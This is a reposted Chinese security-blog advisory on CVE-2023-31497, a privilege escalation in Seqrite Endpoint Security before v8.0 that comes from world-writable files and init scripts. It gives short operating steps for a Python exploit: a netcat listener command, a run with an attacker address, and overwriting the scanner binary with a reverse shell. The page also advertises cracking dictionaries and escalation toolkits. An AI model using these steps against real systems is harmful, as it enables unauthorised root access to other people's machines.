CVE-2023-31497!Seqrite Endpoint Security端点安全 (EPS) 提权漏洞
2023-5-17 08:32:37 Author: 潇湘信安(查看原文) 阅读量:20 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了

漏洞简介

QuickHeal 的 Seqrite 企业端点安全解决方案 (EPS) 中的提权漏洞;v8.0 之前的所有版本中的不正确访问控制允许攻击者通过向目标系统提供精心制作的二进制文件将权限提升到 root。

该漏洞的 CVE ID 为 CVE-2023-31497,已在所有基于 Debian 和 Ubuntu 的变体操作系统上进行了测试。

供应商和产品详细信息

卖方: Quick Heal Technologies Limited产品:Seqrite 端点安全(EPS)产品主页:https: //www.seqrite.com/endpoint-security/seqrite-endpoint-security受影响的版本:影响 v8.0 之前的所有版本。

漏洞详情

Seqrite 端点安全及其默认安装到/usr/lib/Seqrite/具有非常弱的目录和文件权限,授予本地用户对目录内容的完全读/写权限。此外,安装过程会安装其全局/etc/init.d/可写的启动脚本,这使系统上的任何低权限用户都可以将权限提升到 root。

该漏洞利用软件引入的 2 个不同漏洞来提升系统权限。首先,应用程序使用脚本来/etc/init.d/启动其扫描过程,任何用户都可以写入该脚本。其次,应用程序使用共享对象在运行时动态加载位置无关代码 (PIC)。事实上,所有可执行的共享目标文件都是全局可写的。最后,用于守护进程的应用程序二进制文件是世界可写的,这基本上意味着任何非特权用户都可以使用反向 shell 二进制文件覆盖扫描程序二进制文件以执行任意代码,如root.

漏洞利用

该漏洞利用程序是一个简单的 Python 文件,可帮助利用该漏洞,操作步骤如下。
在攻击者机器上,使用netcat(nc -lvp <port>)或metasploit(multi/handler)启动监听器。epscalate.py将和文件复制/下载shellcode.c到目标系统上。使用适当的参数( )运行python文件python3 epscalate.py -H 192.168.0.103:9999 -I。等待AV重新加载/系统重新启动。与您的侦听器的反向连接可以确认代码以root身份执行。
← 左右滑动查看更多 
视频演示:

下载地址

点击下方名片进入公众号

回复关键字【31497】获取下载链接


关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包
 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247503596&idx=1&sn=788cc689e440b42d5a5a2b76181582b3&chksm=cfa56afff8d2e3e924f31dd942796d6dad7c5581981924a2533e9d797f2fcb5b45614a6b7cb3#rd
如有侵权请联系:admin#unsafe.sh